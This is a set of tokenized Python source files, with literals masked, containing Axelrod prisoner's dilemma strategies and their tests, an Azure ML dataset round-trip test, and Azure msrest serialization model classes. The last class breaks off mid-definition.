score_map = { ( C , C ) : <NUM_LIT:0> , <EOL> ( C , D ) : <NUM_LIT:2> , <EOL> ( D , C ) : <NUM_LIT:1> , <EOL> ( D , D ) : <NUM_LIT:3> } <EOL> super ( Nydegger , self ) . __init__ ( ) <EOL> @ staticmethod <EOL> def score_history ( my_history , opponent_history , score_map ) : <EOL> """<STR_LIT>""" <EOL> a = <NUM_LIT:0> <EOL> for i , weight in [ ( - <NUM_LIT:1> , <NUM_LIT:16> ) , ( - <NUM_LIT:2> , <NUM_LIT:4> ) , ( - <NUM_LIT:3> , <NUM_LIT:1> ) ] : <EOL> plays = ( my_history [ i ] , opponent_history [ i ] ) <EOL> a += weight * score_map [ plays ] <EOL> return a <EOL> def strategy ( self , opponent ) : <EOL> if len ( self . history ) == <NUM_LIT:0> : <EOL> return C <EOL> if len ( self . history ) == <NUM_LIT:1> : <EOL> return D if opponent . history [ - <NUM_LIT:1> ] == D else C <EOL> if len ( self . history ) == <NUM_LIT:2> : <EOL> if opponent . history [ <NUM_LIT:0> : <NUM_LIT:2> ] == [ D , C ] : <EOL> return D <EOL> else : <EOL> return D if opponent . history [ - <NUM_LIT:1> ] == D else C <EOL> A = self . score_history ( self . history [ - <NUM_LIT:3> : ] , opponent . history [ - <NUM_LIT:3> : ] , <EOL> self . score_map ) <EOL> if A in self . As : <EOL> return D <EOL> return C <EOL> class Shubik ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def __init__ ( self ) : <EOL> Player . __init__ ( self ) <EOL> self . is_retaliating = False <EOL> self . retaliation_length = <NUM_LIT:0> <EOL> self . retaliation_remaining = <NUM_LIT:0> <EOL> def _decrease_retaliation_counter ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_retaliating : <EOL> self . retaliation_remaining -= <NUM_LIT:1> <EOL> if self . retaliation_remaining == <NUM_LIT:0> : <EOL> self . is_retaliating = False <EOL> def strategy ( self , opponent ) : <EOL> if not opponent . 
history : <EOL> return C <EOL> if opponent . history [ - <NUM_LIT:1> ] == D : <EOL> if self . history [ - <NUM_LIT:1> ] == C : <EOL> self . is_retaliating = True <EOL> self . retaliation_length += <NUM_LIT:1> <EOL> self . retaliation_remaining = self . retaliation_length <EOL> self . _decrease_retaliation_counter ( ) <EOL> return D <EOL> else : <EOL> if self . is_retaliating : <EOL> self . _decrease_retaliation_counter ( ) <EOL> return D <EOL> if self . is_retaliating : <EOL> self . _decrease_retaliation_counter ( ) <EOL> return D <EOL> return C <EOL> def reset ( self ) : <EOL> Player . reset ( self ) <EOL> self . is_retaliating = False <EOL> self . retaliation_length = <NUM_LIT:0> <EOL> self . retaliation_remaining = <NUM_LIT:0> <EOL> class Tullock ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:11> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self , rounds_to_cooperate = <NUM_LIT:11> ) : <EOL> """<STR_LIT>""" <EOL> Player . __init__ ( self ) <EOL> self . _rounds_to_cooperate = rounds_to_cooperate <EOL> self . __class__ . memory_depth = rounds_to_cooperate <EOL> def strategy ( self , opponent ) : <EOL> rounds = self . _rounds_to_cooperate <EOL> if len ( self . history ) < rounds : <EOL> return C <EOL> cooperate_count = opponent . history [ - rounds : ] . 
count ( C ) <EOL> prop_cooperate = cooperate_count / float ( rounds ) <EOL> prob_cooperate = max ( <NUM_LIT:0> , prop_cooperate - <NUM_LIT> ) <EOL> return random_choice ( prob_cooperate ) <EOL> class UnnamedStrategy ( Player ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ staticmethod <EOL> def strategy ( opponent ) : <EOL> r = random . uniform ( <NUM_LIT:3> , <NUM_LIT:7> ) / float ( <NUM_LIT:10> ) <EOL> return random_choice ( r ) </s>
<s> from axelrod import Actions , Player , init_args <EOL> from axelrod . _strategy_utils import thue_morse_generator <EOL> class SequencePlayer ( Player ) : <EOL> """<STR_LIT>""" <EOL> @ init_args <EOL> def __init__ ( self , generator_function , generator_args = ( ) ) : <EOL> Player . __init__ ( self ) <EOL> self . generator_function = generator_function <EOL> self . generator_args = generator_args <EOL> self . sequence_generator = self . generator_function ( * self . generator_args ) <EOL> def meta_strategy ( self , value ) : <EOL> """<STR_LIT>""" <EOL> if value == <NUM_LIT:0> : <EOL> return Actions . D <EOL> else : <EOL> return Actions . C <EOL> def strategy ( self , opponent ) : <EOL> for s in self . sequence_generator : <EOL> return self . meta_strategy ( s ) <EOL> def reset ( self ) : <EOL> Player . reset ( self ) <EOL> self . sequence_generator = self . generator_function ( * self . generator_args ) <EOL> class ThueMorse ( SequencePlayer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self ) : <EOL> SequencePlayer . __init__ ( self , thue_morse_generator , ( <NUM_LIT:0> , ) ) <EOL> class ThueMorseInverse ( ThueMorse ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> @ init_args <EOL> def __init__ ( self ) : <EOL> SequencePlayer . __init__ ( self , thue_morse_generator , ( <NUM_LIT:0> , ) ) <EOL> def meta_strategy ( self , value ) : <EOL> if value == <NUM_LIT:0> : <EOL> return Actions . C <EOL> else : <EOL> return Actions . D </s>
<s> """<STR_LIT>""" <EOL> import axelrod <EOL> from . test_player import TestPlayer , test_responses , TestOpponent <EOL> C , D = axelrod . Actions . C , axelrod . Actions . D <EOL> class TestGrumpy ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . Grumpy <EOL> expected_classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_initial_nice_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_initial_grumpy_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> P1 = axelrod . Grumpy ( starting_state = '<STR_LIT>' ) <EOL> P2 = TestOpponent ( ) <EOL> self . assertEqual ( P1 . strategy ( P2 ) , D ) <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> P1 = axelrod . Grumpy ( grumpy_threshold = <NUM_LIT:3> , nice_threshold = <NUM_LIT:0> ) <EOL> P2 = TestOpponent ( ) <EOL> test_responses ( self , P1 , P2 , [ C , D , D , D ] , [ C , C , C , C ] , [ C ] ) <EOL> P1 = axelrod . Grumpy ( grumpy_threshold = <NUM_LIT:3> , nice_threshold = <NUM_LIT:0> ) <EOL> P2 = TestOpponent ( ) <EOL> test_responses ( self , P1 , P2 , [ C , C , D , D , D ] , [ D , D , D , D , D ] , [ D ] ) <EOL> P1 = axelrod . Grumpy ( grumpy_threshold = <NUM_LIT:3> , nice_threshold = <NUM_LIT:0> ) <EOL> P2 = TestOpponent ( ) <EOL> test_responses ( self , P1 , P2 , [ C , C , D , D , D , D , D , D ] , <EOL> [ D , D , D , D , D , C , C , C ] , [ D ] ) <EOL> P1 = axelrod . Grumpy ( grumpy_threshold = <NUM_LIT:3> , nice_threshold = <NUM_LIT:0> ) <EOL> P2 = TestOpponent ( ) <EOL> test_responses ( self , P1 , P2 , [ C , C , D , D , D , D , D , D , D , D , D ] , <EOL> [ D , D , D , D , D , C , C , C , C , C , C ] , [ C ] ) <EOL> def test_reset_method ( self ) : <EOL> """<STR_LIT>""" <EOL> P1 = axelrod . Grumpy ( starting_state = '<STR_LIT>' ) <EOL> P1 . history = [ C , D , D , D ] <EOL> P1 . 
state = '<STR_LIT>' <EOL> P1 . reset ( ) <EOL> self . assertEqual ( P1 . history , [ ] ) <EOL> self . assertEqual ( P1 . state , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import axelrod <EOL> from . test_player import TestHeadsUp , TestPlayer <EOL> C , D = axelrod . Actions . C , axelrod . Actions . D <EOL> class TestTitForTat ( TestPlayer ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> player = axelrod . TitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . markov_test ( [ C , D , C , D ] ) <EOL> self . responses_test ( [ C ] * <NUM_LIT:4> , [ C , C , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C ] * <NUM_LIT:5> , [ C , C , C , C , D ] , [ D ] ) <EOL> class TestTitFor2Tats ( TestPlayer ) : <EOL> name = '<STR_LIT>' <EOL> player = axelrod . TitFor2Tats <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C , C , C ] , [ D , D , D ] , [ D ] ) <EOL> self . responses_test ( [ C , C , D , D ] , [ D , D , D , C ] , [ C ] ) <EOL> class TestTwoTitsForTat ( TestPlayer ) : <EOL> name = '<STR_LIT>' <EOL> player = axelrod . TwoTitsForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
responses_test ( [ C ] , [ D ] , [ D ] ) <EOL> self . responses_test ( [ C , C ] , [ D , D ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , D , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , D , D ] , [ D , D , C , C ] , [ C ] ) <EOL> class TestBully ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . Bully <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( D ) <EOL> def test_affect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . markov_test ( [ D , C , D , C ] ) <EOL> class TestSneakyTitForTat ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . SneakyTitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C , C ] , [ C , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , D , D ] , [ C , C , C , D ] , [ C ] ) <EOL> class TestSuspiciousTitForTat ( TestPlayer ) : <EOL> name = '<STR_LIT>' <EOL> player = axelrod . SuspiciousTitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( D ) <EOL> def test_affect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
markov_test ( [ C , D , C , D ] ) <EOL> class TestAntiTitForTat ( TestPlayer ) : <EOL> name = '<STR_LIT>' <EOL> player = axelrod . AntiTitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_affect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . markov_test ( [ D , C , D , C ] ) <EOL> class TestHardTitForTat ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . HardTitForTat <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C , C , C ] , [ C , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , C , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , D , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , C , D ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C , C ] , [ D , C , C , C ] , [ C ] ) <EOL> class TestHardTitFor2Tats ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . HardTitFor2Tats <EOL> expected_classifier = { <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> def test_effect_of_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . responses_test ( [ C , C , C ] , [ C , C , C ] , [ C ] ) <EOL> self . 
responses_test ( [ C , C , C ] , [ D , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , D , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , C , D ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , C , D ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C ] , [ D , D , C ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C ] , [ C , D , D ] , [ D ] ) <EOL> self . responses_test ( [ C , C , C , C ] , [ D , C , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C , C ] , [ D , D , C , C ] , [ C ] ) <EOL> self . responses_test ( [ C , C , C , C ] , [ C , D , D , C ] , [ D ] ) <EOL> class OmegaTFT ( TestPlayer ) : <EOL> name = "<STR_LIT>" <EOL> player = axelrod . OmegaTFT <EOL> expected_classifier = { <EOL> '<STR_LIT>' : float ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False <EOL> } <EOL> def test_strategy ( self ) : <EOL> """<STR_LIT>""" <EOL> self . first_play_test ( C ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> self . responses_test ( [ C ] * i , [ C ] * i , [ C ] ) <EOL> def test_reset ( self ) : <EOL> player = self . player ( ) <EOL> opponent = axelrod . Defector ( ) <EOL> [ player . play ( opponent ) for _ in range ( <NUM_LIT:10> ) ] <EOL> player . reset ( ) <EOL> self . assertEqual ( player . randomness_counter , <NUM_LIT:0> ) <EOL> self . assertEqual ( player . deadlock_counter , <NUM_LIT:0> ) <EOL> class TestOmegaTFTvsSTFT ( TestHeadsUp ) : <EOL> def test_rounds ( self ) : <EOL> outcomes = zip ( ) <EOL> self . versus_test ( axelrod . OmegaTFT ( ) , axelrod . SuspiciousTitForTat ( ) , <EOL> [ C , D , C , D , C , C , C , C , C ] , <EOL> [ D , C , D , C , D , C , C , C , C ] ) <EOL> class TestOmegaTFTvsAlternator ( TestHeadsUp ) : <EOL> def test_rounds ( self ) : <EOL> self . versus_test ( axelrod . OmegaTFT ( ) , axelrod . 
Alternator ( ) , <EOL> [ C , C , D , C , D , C , C , C , D , C , C , C , D , D , D , D , D , D ] , <EOL> [ C , D , C , D , C , D , C , D , C , D , C , D , C , D , C , D , C , D ] ) </s>
<s> import unittest <EOL> import pandas as pd <EOL> from pandas . util . testing import assert_frame_equal <EOL> from azure . storage import BlobService <EOL> from azureml import ( <EOL> BytesIO , <EOL> Workspace , <EOL> DataTypeIds , <EOL> ) <EOL> from tests import ( <EOL> id_generator , <EOL> load_test_settings , <EOL> ) <EOL> settings = load_test_settings ( ) <EOL> class RoundTripTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . workspace = Workspace ( <EOL> settings . workspace . id , <EOL> settings . workspace . token , <EOL> settings . workspace . endpoint <EOL> ) <EOL> self . blob = BlobService ( <EOL> settings . storage . account_name , <EOL> settings . storage . account_key <EOL> ) <EOL> def _write_blob_contents ( self , filename , data ) : <EOL> if settings . diagnostics . write_blob_contents : <EOL> with open ( '<STR_LIT>' + filename , '<STR_LIT:wb>' ) as data_file : <EOL> data_file . write ( data ) <EOL> def _write_serialized_frame ( self , filename , data ) : <EOL> if settings . diagnostics . write_serialized_frame : <EOL> with open ( '<STR_LIT>' + filename , '<STR_LIT:wb>' ) as data_file : <EOL> data_file . write ( data ) <EOL> def test_download_blob_then_upload_as_dataframe_then_read_dataset ( self ) : <EOL> def datatypeid_from_header_and_format ( header , format ) : <EOL> if format == '<STR_LIT>' : <EOL> if header == '<STR_LIT>' : <EOL> return DataTypeIds . GenericCSV <EOL> else : <EOL> return DataTypeIds . GenericCSVNoHeader <EOL> elif format == '<STR_LIT>' : <EOL> if header == '<STR_LIT>' : <EOL> return DataTypeIds . GenericTSV <EOL> else : <EOL> return DataTypeIds . GenericTSVNoHeader <EOL> elif format == '<STR_LIT>' : <EOL> return DataTypeIds . PlainText <EOL> else : <EOL> self . assertTrue ( False , '<STR_LIT>' ) <EOL> def split_blob_name ( blob_name ) : <EOL> name , format = blob_name . lower ( ) . split ( '<STR_LIT:.>' ) <EOL> if format != '<STR_LIT>' : <EOL> name , header = name . 
split ( '<STR_LIT:_>' ) <EOL> else : <EOL> header = '<STR_LIT>' <EOL> return name , format , header <EOL> for blob_name in settings . storage . blobs : <EOL> print ( blob_name ) <EOL> name , format , header = split_blob_name ( blob_name ) <EOL> original_data = self . blob . get_blob_to_bytes ( settings . storage . container , blob_name ) <EOL> self . _write_blob_contents ( blob_name , original_data ) <EOL> original_dataframe = pd . read_csv ( <EOL> BytesIO ( original_data ) , <EOL> header = <NUM_LIT:0> if header == '<STR_LIT>' else None , <EOL> sep = '<STR_LIT:U+002C>' if format == '<STR_LIT>' else '<STR_LIT:\t>' if format == '<STR_LIT>' else '<STR_LIT:\n>' , <EOL> encoding = '<STR_LIT>' <EOL> ) <EOL> dataset_name = '<STR_LIT>' + name + id_generator ( ) <EOL> description = '<STR_LIT>' + dataset_name <EOL> data_type_id = datatypeid_from_header_and_format ( header , format ) <EOL> self . workspace . datasets . add_from_dataframe ( <EOL> original_dataframe , <EOL> data_type_id , <EOL> dataset_name , <EOL> description , <EOL> ) <EOL> dataset = self . workspace . datasets [ dataset_name ] <EOL> self . assertIsNotNone ( dataset ) <EOL> result_data = dataset . read_as_binary ( ) <EOL> self . _write_serialized_frame ( blob_name , result_data ) <EOL> result_dataframe = dataset . to_dataframe ( ) <EOL> assert_frame_equal ( original_dataframe , result_dataframe ) <EOL> def test_azureml_example_datasets ( self ) : <EOL> max_size = <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT> <EOL> skip = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> for dataset in self . workspace . example_datasets : <EOL> if not hasattr ( dataset , '<STR_LIT>' ) : <EOL> print ( '<STR_LIT>' . format ( dataset . name ) ) <EOL> continue <EOL> if dataset . size > max_size : <EOL> print ( '<STR_LIT>' . format ( dataset . name ) ) <EOL> continue <EOL> if dataset . name in skip : <EOL> print ( '<STR_LIT>' . format ( dataset . name ) ) <EOL> continue <EOL> print ( '<STR_LIT>' + dataset . 
name ) <EOL> frame = dataset . to_dataframe ( ) <EOL> print ( '<STR_LIT>' + dataset . name ) <EOL> dataset_name = '<STR_LIT>' + dataset . name + id_generator ( ) <EOL> description = '<STR_LIT>' + dataset_name <EOL> self . workspace . datasets . add_from_dataframe ( frame , dataset . data_type_id , dataset_name , description ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
from msrest.paging import Paged


class CertificatePaged(Paged):
    """Paging container for iterating over a list of certificate objects."""

    # Wire-format mapping used by the msrest paging machinery.
    _attribute_map = {
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT:value>', '<STR_LIT:type>': '<STR_LIT>'}
    }

    def __init__(self, *args, **kwargs):
        # All behaviour comes from the generic Paged base class.
        super(CertificatePaged, self).__init__(*args, **kwargs)
from msrest.serialization import Model


class ComputeNodeUser(Model):
    """Serialization model for a compute-node user account.

    :param name: Required account name.
    :param is_admin: Optional admin flag.
    :param expiry_time: Optional expiry.
    :param password: Optional password.
    :param ssh_public_key: Optional SSH public key.
    """

    # Only 'name' is required by the service.
    _validation = {
        '<STR_LIT:name>': {'<STR_LIT>': True},
    }

    _attribute_map = {
        '<STR_LIT:name>': {'<STR_LIT:key>': '<STR_LIT:name>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:bool>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT:password>': {'<STR_LIT:key>': '<STR_LIT:password>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
    }

    def __init__(self, name, is_admin=None, expiry_time=None, password=None, ssh_public_key=None):
        self.name = name
        self.is_admin = is_admin
        self.expiry_time = expiry_time
        self.password = password
        self.ssh_public_key = ssh_public_key
from msrest.serialization import Model


class JobListPreparationAndReleaseTaskStatusOptions(Model):
    """Request options for the job list-preparation-and-release-task-status call.

    All parameters are optional; ``timeout`` defaults to 30.
    NOTE: the ``filter`` parameter shadows the builtin of the same name —
    kept as-is because it is part of the public signature.
    """

    def __init__(self, filter=None, select=None, max_results=None, timeout=30,
                 client_request_id=None, return_client_request_id=None, ocp_date=None):
        self.filter = filter
        self.select = select
        self.max_results = max_results
        self.timeout = timeout
        self.client_request_id = client_request_id
        self.return_client_request_id = return_client_request_id
        self.ocp_date = ocp_date
from msrest.serialization import Model


class JobUpdateOptions(Model):
    """Request options for a job update call.

    Carries the standard request headers (timeout, client request id,
    ocp date) plus HTTP conditional headers (if-match / if-modified-since).
    """

    def __init__(self, timeout=30, client_request_id=None,
                 return_client_request_id=None, ocp_date=None, if_match=None,
                 if_none_match=None, if_modified_since=None, if_unmodified_since=None):
        self.timeout = timeout
        self.client_request_id = client_request_id
        self.return_client_request_id = return_client_request_id
        self.ocp_date = ocp_date
        self.if_match = if_match
        self.if_none_match = if_none_match
        self.if_modified_since = if_modified_since
        self.if_unmodified_since = if_unmodified_since
from msrest.serialization import Model


class PoolPatchOptions(Model):
    """Request options for a pool patch call.

    Same shape as the other *Options models: standard request headers plus
    HTTP conditional headers.
    """

    def __init__(self, timeout=30, client_request_id=None,
                 return_client_request_id=None, ocp_date=None, if_match=None,
                 if_none_match=None, if_modified_since=None, if_unmodified_since=None):
        self.timeout = timeout
        self.client_request_id = client_request_id
        self.return_client_request_id = return_client_request_id
        self.ocp_date = ocp_date
        self.if_match = if_match
        self.if_none_match = if_none_match
        self.if_modified_since = if_modified_since
        self.if_unmodified_since = if_unmodified_since
from msrest.serialization import Model


class TaskConstraints(Model):
    """Execution constraints for a task (wall-clock limit, retention, retries)."""

    _attribute_map = {
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:int>'},
    }

    def __init__(self, max_wall_clock_time=None, retention_time=None, max_task_retry_count=None):
        self.max_wall_clock_time = max_wall_clock_time
        self.retention_time = retention_time
        self.max_task_retry_count = max_task_retry_count
# Package version string (value masked in this corpus).
VERSION = "<STR_LIT>"
from msrest.serialization import Model


class KeyCredential(Model):
    """Serialization model for a key credential (validity window, value, id, usage, type)."""

    _attribute_map = {
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT:value>': {'<STR_LIT:key>': '<STR_LIT:value>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:type>': {'<STR_LIT:key>': '<STR_LIT:type>', '<STR_LIT:type>': '<STR_LIT:str>'},
    }

    def __init__(self, start_date=None, end_date=None, value=None, key_id=None, usage=None, type=None):
        self.start_date = start_date
        self.end_date = end_date
        self.value = value
        self.key_id = key_id
        self.usage = usage
        # NOTE: 'type' shadows the builtin but is part of the public signature.
        self.type = type
from msrest.serialization import Model


class ProviderOperationsMetadata(Model):
    """Serialization model for provider operations metadata."""

    _attribute_map = {
        '<STR_LIT:id>': {'<STR_LIT:key>': '<STR_LIT:id>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:name>': {'<STR_LIT:key>': '<STR_LIT:name>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:type>': {'<STR_LIT:key>': '<STR_LIT:type>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT>'},
    }

    def __init__(self, id=None, name=None, type=None, display_name=None,
                 resource_types=None, operations=None):
        # 'id' and 'type' shadow builtins but are part of the public signature.
        self.id = id
        self.name = name
        self.type = type
        self.display_name = display_name
        self.resource_types = resource_types
        self.operations = operations
from msrest.serialization import Model


class AddApplicationPackageResult(Model):
    """Result of adding an application package (id, version, upload URL and expiry)."""

    _attribute_map = {
        '<STR_LIT:id>': {'<STR_LIT:key>': '<STR_LIT:id>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT:version>': {'<STR_LIT:key>': '<STR_LIT:version>', '<STR_LIT:type>': '<STR_LIT:str>'},
        '<STR_LIT>': {'<STR_LIT:key>': '<STR_LIT>', '<STR_LIT:type>': '<STR_LIT:str>'},
